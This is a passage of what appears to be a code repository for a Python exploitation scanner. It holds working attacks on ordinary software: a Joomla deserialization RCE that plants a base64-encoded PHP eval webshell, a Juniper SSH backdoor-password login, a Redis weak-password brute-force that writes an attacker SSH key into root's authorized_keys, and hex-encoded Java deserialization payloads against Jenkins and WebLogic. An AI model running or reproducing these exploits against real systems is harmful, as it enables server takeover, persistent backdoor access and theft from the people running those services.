1\x00\x7e\x00\x34\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x36\x71\x00\x7e\x00\x3a\x78\x78\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x07\x46\xac\xed\x00\x05\x73\x72\x00\x32\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x24\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\x49\x00\x03\x6f\x69\x64\x5b\x00\x09\x61\x72\x67\x75\x6d\x65\x6e\x74\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x05\x74\x79\x70\x65\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x77\x08\xff\xff\xff\xfe\x00\x00\x00\x02\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x49\x00\x02\x69\x64\x49\x00\x08\x6c\x61\x73\x74\x49\x6f\x49\x64\x4c\x00\x08\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x00\x1a\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x73\x70\x6f\x6e\x73\x65\x3b\x77\x04\x00\x00\x00\x00\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x09\x63\x72\x65\x61\x74\x65\x64\x41\x74\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x77\x04\x00\x00\x00\x00\x78\x70\x73\x72\x00\x1e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x24\x53\x6f\x75\x72\x63\x65\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x19\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3b\x77\x04\x00\x00\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a\x3b\x1c\xc4\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x71\x00\x7e\x00\x02\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x77\x04\xff\xff\xff\xfd\x78\x70\x71\x00\x7e\x00\x10\x70\x75\x72\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x0b\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x04\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73\x71\x00\x7e\x00\x02\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x43\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x74\x00\x0c\x43\x6f\x6d\x6d\x61\x6e\x64\x2e\x6a\x61\x76\x61\x74\x00\x06\x3c\x69\x6e\x69\x74\x3e\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x32\x71\x00\x7e\x00\x15\x71\x00\x7e\x00\x16\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x63\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x74\x00\x0c\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x02\x39\x74\x00\x32\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x24\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x74\x00\x1c\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xf6\x74\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x71\x00\x7e\x00\x1e\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x24\x50\x72\x6f\x78\x79\x31\x70\x74\x00\x0f\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x68\x61\x6e\x6e\x65\x6c\x74\x00\x0c\x43\x68\x61\x6e\x6e\x65\x6c\x2e\x6a\x61\x76\x61\x74\x00\x15\x77\x61\x69\x74\x46\x6f\x72\x52\x65\x6d\x6f\x74\x65\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x74\x00\x0e\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x74\x00\x08\x43\x4c\x49\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x74\x00\x1f\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x19\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x2e\x6a\x61\x76\x61\x74\x00\x07\x63\x6f\x6e\x6e\x65\x63\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2a\x71\x00\x7e\x00\x2b\x74\x00\x05\x5f\x6d\x61\x69\x6e\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2a\x71\x00\x7e\x00\x2b\x74\x00\x04\x6d\x61\x69\x6e\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x4c\x69\x73\x74\xfc\x0f\x25\x31\xb5\xec\x8e\x10\x02\x00\x01\x4c\x00\x04\x6c\x69\x73\x74\x71\x00\x7e\x00\x0f\x77\x04\xff\xff\xff\xfd\x78\x72\x00\x2c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x19\x42\x00\x80\xcb\x5e\xf7\x1e\x02\x00\x01\x4c\x00\x01\x63\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x3b\x77\x04\xff\xff\xff\xfd\x78\x70\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x41\x72\x72\x61\x79\x4c\x69\x73\x74\x78\x81\xd2\x1d\x99\xc7\x61\x9d\x03\x00\x01\x49\x00\x04\x73\x69\x7a\x65\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x00\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7e\x00\x39\x78\x71\x00\x7e\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x70\x00\x00\x00\x01\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x01\x74\x00\x18\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x6c\x69\x45\x6e\x74\x72\x79\x50\x6f\x69\x6e\x74\x71\x00\x7e\x00\x24\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x74\x00\x1d\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x28\x31\x2c\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x29'
42 |         sock.send(payload)
43 |         msg = 'may vul, check access.log'
44 |         return True, 'http://'+host+str(port), msg
45 |     except Exception, e:
46 |         msg = str(e)
47 |         return False, 'http://'+host+str(port), msg
48 | 


--------------------------------------------------------------------------------
/node/joomla.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | #coding=utf8
  3 | 
  4 | import urllib2
  5 | import urllib
  6 | import re
  7 | import cookielib, sys
  8 | import requests
  9 | 
 10 | def checkJoomlaRCE(url):
 11 |     poc = generate_payload("phpinfo();")
 12 |     try:
 13 |         result = get_url(url, poc)
 14 |         if 'phpinfo()' in result:
 15 |             system = getInfoByJoomlaRCE(result, 'System')
 16 |             document_root = getInfoByJoomlaRCE(result, 'DOCUMENT_ROOT')
 17 |             if document_root == 'no info!':
 18 |                 msg = 'vul, but get shell failed!'
 19 |                 return False, url,  msg
 20 |             script_filename = getInfoByJoomlaRCE(result, 'SCRIPT_FILENAME')
 21 |             if script_filename == 'no info!':
 22 |                 msg = 'vul, but get shell failed!'
 23 |                 return False, url, msg
 24 |             shell_file = getShellByJoomlaRCE(url, system, script_filename)
 25 |             if shell_file == 'no info!':
 26 |                 msg = 'vul, but get shell failed!'
 27 |                 return False, url, msg
 28 |             msg = 'get shell succsss, shell:  %s' %shell_file
 29 |             return True, url, msg
 30 |         else:
 31 |             msg = 'safe'
 32 |             return False, url, msg
 33 |             # print '[!] no vuls! url: '+url
 34 |     except Exception,e:
 35 |         msg = str(e)
 36 |         return False, url, msg
 37 | 
 38 | def getShellByJoomlaRCE(url, system, script_filename):
 39 |     if 'no info' not in script_filename and 'no info' not in system:
 40 |         if 'Windows' in system:
 41 |             shell = script_filename.split('index.php')[0].replace('/','//').strip()+"nwes.php"
 42 |         else:
 43 |             shell = script_filename.split('index.php')[0]+"nwes.php"
 44 |         cmd ="file_put_contents('"+shell+"',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7ID8+'));"
 45 |         pl = generate_payload(cmd)
 46 |         try:
 47 |             get_url(url, pl)
 48 |             return url+"nwes.php"
 49 |         except Exception, e:
 50 |             return "no info!"
 51 |     else:
 52 |         return "no info!"
 53 |   
 54 | def getInfoByJoomlaRCE(result, param):
 55 |     if "System" in param:
 56 |         reg = '.*<tr><td class="e">System </td><td class="v">([^<>]*?)</td></tr>.*'
 57 |     elif "DOCUMENT_ROOT" in param:
 58 |         reg = '.*<tr><td class="e">DOCUMENT_ROOT </td><td class="v">([^<>]*?)</td></tr>.*'
 59 |     elif "SCRIPT_FILENAME" in param:
 60 |         reg = '.*<tr><td class="e">SCRIPT_FILENAME </td><td class="v">([^<>]*?)</td></tr>.*'
 61 |     match_url = re.search(reg,result)
 62 |     if match_url:
 63 |        info = match_url.group(1)
 64 |     else:
 65 |         info = 'no info!'
 66 |     return info
 67 | 
 68 | def get_url(url, user_agent): 
 69 |     headers = {
 70 |     'User-Agent': user_agent
 71 |     }
 72 |     cookies = requests.get(url,headers=headers).cookies
 73 |     for _ in range(2):
 74 |         response = requests.get(url, headers=headers, cookies=cookies)
 75 |     return response.content
 76 |     
 77 | def php_str_noquotes(data):
 78 |     "Convert string to chr(xx).chr(xx) for use in php"
 79 |     encoded = ""
 80 |     for char in data:
 81 |         encoded += "chr({0}).".format(ord(char))
 82 |     return encoded[:-1]
 83 |   
 84 | def generate_payload(php_payload): 
 85 |     php_payload = "eval({0})".format(php_str_noquotes(php_payload))
 86 |     terminate = '\xf0\xfd\xfd\xfd';
 87 |     exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
 88 |     injected_payload = "{};JFactory::getConfig();exit".format(php_payload)    
 89 |     exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
 90 |     exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
 91 |   
 92 |     return exploit_template
 93 |   
 94 | 
 95 | #verify vulnerable 
 96 | def verify(url):
 97 |     cj = cookielib.CookieJar()
 98 |     opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
 99 |     urllib2.install_opener(opener)
100 |     urllib2.socket.setdefaulttimeout(10)
101 | 
102 |     ua = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86'
103 |     req = urllib2.Request(url=url, headers={'User-Agent': ua})
104 |     opener.open(req)
105 |     req = urllib2.Request(url=url)
106 |     res = opener.open(req).read()
107 |     if '_SERVER["DOCUMENT_ROOT"]' in res:
108 |         msg = 'vul'
109 |         return True, url, msg
110 |     else:
111 |         msg = 'safe'
112 |         return False, url, msg
113 | 
114 | #exploit vulnerable
115 | def exploit(url):
116 |     res = checkJoomlaRCE(url)
117 |     return res


--------------------------------------------------------------------------------
/node/joomla.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/node/joomla.pyc


--------------------------------------------------------------------------------
/node/juniperBackdoor.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #coding=utf8
 3 | 
 4 | import sys
 5 | 
 6 | #Check if we are running this on windows platform, windows not support pexpect
 7 | is_windows = sys.platform.startswith('win')
 8 | if is_windows:
 9 |     sys.exit(0)
10 | else:
11 |     from pexpect import pxssh
12 | 
13 | def connectSSH(host, user, passwd):
14 |     try:
15 |         ssh = pxssh.pxssh()
16 |         ssh.login(host, user, passwd, auto_prompt_reset = False)
17 |         return ssh
18 |     except Exception, e:
19 |         print "%s is not vul" % host
20 | 
21 | def verify(host):
22 |     user = "root"
23 |     passwd = "<<< %s(un='%s') = %u"
24 |     theSSH = connectSSH(ip, user, passwd)
25 |     if theSSH:
26 |         before = theSSH.before
27 |         try:
28 |             theSSH.logout()
29 |         except:
30 |             pass
31 |         isval = isval = re.search('Remote Management Console', before)
32 |         if isval:
33 |             msg = 'vul'
34 |             return True, host, msg
35 |         else:
36 |             msg = 'safe'
37 |             return False, host, msg
38 |     else:
39 |         msg = 'connect ssh failed'
40 |         return False, host, msg


--------------------------------------------------------------------------------
/node/redis_weak_ssh.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #coding=utf8
 3 | 
 4 | import redis
 5 | import os, subprocess
 6 | import pexpect
 7 | 
 8 | #sshkey dir
 9 | keypath = os.path.dirname(os.path.realpath(__file__)) + os.sep + 'static' + os.sep + 'sshkey.txt'
10 | 
11 | passwd = ['', '123456', '12345678', 'root', 'admin123', 'admin', '111111']
12 | 
13 | def verify(host):
14 |     for ps in passwd:
15 |         r = redis.Redis(host, port=6379, db=0, password=ps)
16 |         try:
17 |             r.info()
18 |             if ps == '':
19 |                 msg = 'vul, pass is None'
20 |             else:
21 |                 msg = 'vul, pass is %s' %ps
22 |             return True, host, msg
23 |         except Exception, e:
24 |             pass
25 |     msg = 'safe'
26 |     return False, host, msg
27 | 
28 | def exploit(host):
29 |     try:
30 |         foo = '\n\n\n' + open(keypath).readline() + '\n\n\n' 
31 |         r = redis.Redis(host, port=6379, db=0, socket_timeout=2) 
32 |         r.flushall
33 |         r.set('crackit', foo)
34 |         r.config_set('dir', '/root/.ssh/')
35 |         r.config_set('dbfilename','authorized_keys') 
36 |         r.save()
37 |         ssh = pexpect.spawn('ssh root@%s' %host) 
38 |         i = ssh.expect('[#\$]',timeout=2)
39 |         if i == 0:
40 |             msg = 'vul, login success'
41 |             return True, host, msg
42 |         else:
43 |             msg = 'vul, but login failed'
44 |             return True, host, msg
45 |     except Exception,e:
46 |         return False, host, str(e)


--------------------------------------------------------------------------------
/node/static/jboss_poc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/node/static/jboss_poc.bin


--------------------------------------------------------------------------------
/node/static/jenkins_poc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/node/static/jenkins_poc.bin


--------------------------------------------------------------------------------
/node/static/sshkey.txt:
--------------------------------------------------------------------------------
1 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCw7TwJU6LFOTPW+NQkV5nb6mQLX575XkIAMysuSHCi42klc9+jjIpxnOwR/ygF5yc6nODx3tJOwUoWn57qMNVXgJAJY6quSFP6lq+OtOEFpgUVv+A5avO1TlisNyNXjHmTbcc9Q5+9gCPyIAO3EaLHVrjDWWgMMVylv/OfZoqjip7vRw7ub3w/3UMVsb9qzlqouCMgJnFWES5VQ4R9MILXuVMkTIFwWUBiM2HTbA2uCJl6V8Pa+LVMS+TNlLE3RnD+xUCED6YgQ6aU5ytx/0NPvfHzLTvRrTxwTasyK1IEcyPSflz3b/Fh5vqzUlxbi/lGRdMHRg8bsGsXdM7zBJ9 root@localhost


--------------------------------------------------------------------------------
/node/static/weblogic_poc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/node/static/weblogic_poc.bin


--------------------------------------------------------------------------------
/node/weblogic_ser.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | #coding=utf8
 3 | 
 4 | import socket
 5 | import sys
 6 | import os
 7 | import urlparse
 8 | from ext.ParseUrl import ParseUrl
 9 | 
10 | '''
11 | you can verify through access.log, command like this:
12 | cat access.* | awk '{if ($7~/wolegecaweblogic.txt/) print $1}' | uniq | sort
13 | '''
14 | ppath = os.path.dirname(os.path.realpath(__file__)) + os.sep + 'static' + os.sep + 'weblogic_poc.bin'
15 | 
16 | def verify(host):
17 |     parse = ParseUrl()
18 |     if parse.judgeIP(host):
19 |         #weblogic default port
20 |         #port = 7001
21 |         port = 80
22 |     else:
23 |         host, port = parse.parse(host)
24 |     try:
25 |         socket.setdefaulttimeout(10)
26 |         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
27 |         server_address = (host, int(port))
28 |         sock.connect(server_address)
29 |         # Send headers
30 |         headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
31 |         sock.sendall(headers)
32 |         data = sock.recv(1024)
33 |         payloadObj = open(ppath,'rb').read()
34 |         payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
35 |         payload = payload + payloadObj
36 |         payload = payload + '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6